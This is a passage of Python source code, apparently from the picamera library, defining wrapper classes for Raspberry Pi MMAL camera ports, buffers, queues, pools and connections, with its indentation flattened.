# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return (
'<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate,
mmal.FOURCC_str(self.colorspace)))
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_colorspace(self):
return self._port[0].format[0].es[0].video.color_space
def _set_colorspace(self, value):
self._port[0].format[0].es[0].video.color_space = value
colorspace = property(_get_colorspace, _set_colorspace, doc="""\
Retrieves or sets the color-space of the port's frames.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
* ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimatation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
available (for the values of *block* and *timeout*,
:exc:`~picamera.PiCameraMMALError` is raised).
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
they do in :meth:`get_buffer`. If no buffer is available (for the
values of *block* and *timeout*, :exc:`~picamera.PiCameraMMALError` is
raised).
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
"""
The MMAL "raw camera" component.
Don't use this! If you insist on using this anyway, read the forum post
about `raw sensor access`_ first.
.. raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
opaque_input_subformats = ()
opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
"""
Represents the MMAL camera component. This component has 0 input ports and
3 output ports. The intended use of the output ports (which in turn
determines the behaviour of those ports) is as follows:
* Port 0 is intended for preview renderers
* Port 1 is intended for video recording
* Port 2 is intended for still image capture
Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
obtain and manipulate the camera's configuration.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
annotate_structs = (
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V4_T,
)
def __init__(self):
global FIX_RGB_BGR_ORDER
super(MMALCamera, self).__init__()
if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
found = False
# try largest struct to smallest as later firmwares still happily
# accept earlier revision structures
# XXX do old firmwares reject too-large structs?
for struct in reversed(MMALCamera.annotate_structs):
try:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
except PiCameraMMALError:
pass
else:
found = True
break
if not found:
PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
if FIX_RGB_BGR_ORDER is None:
# old firmware lists BGR24 before RGB24 in supported_formats
for f in self.outputs[1].supported_formats:
if f == mmal.MMAL_ENCODING_BGR24:
FIX_RGB_BGR_ORDER = True
break
elif f == mmal.MMAL_ENCODING_RGB24:
FIX_RGB_BGR_ORDER = False
break
def _get_annotate_rev(self):
try:
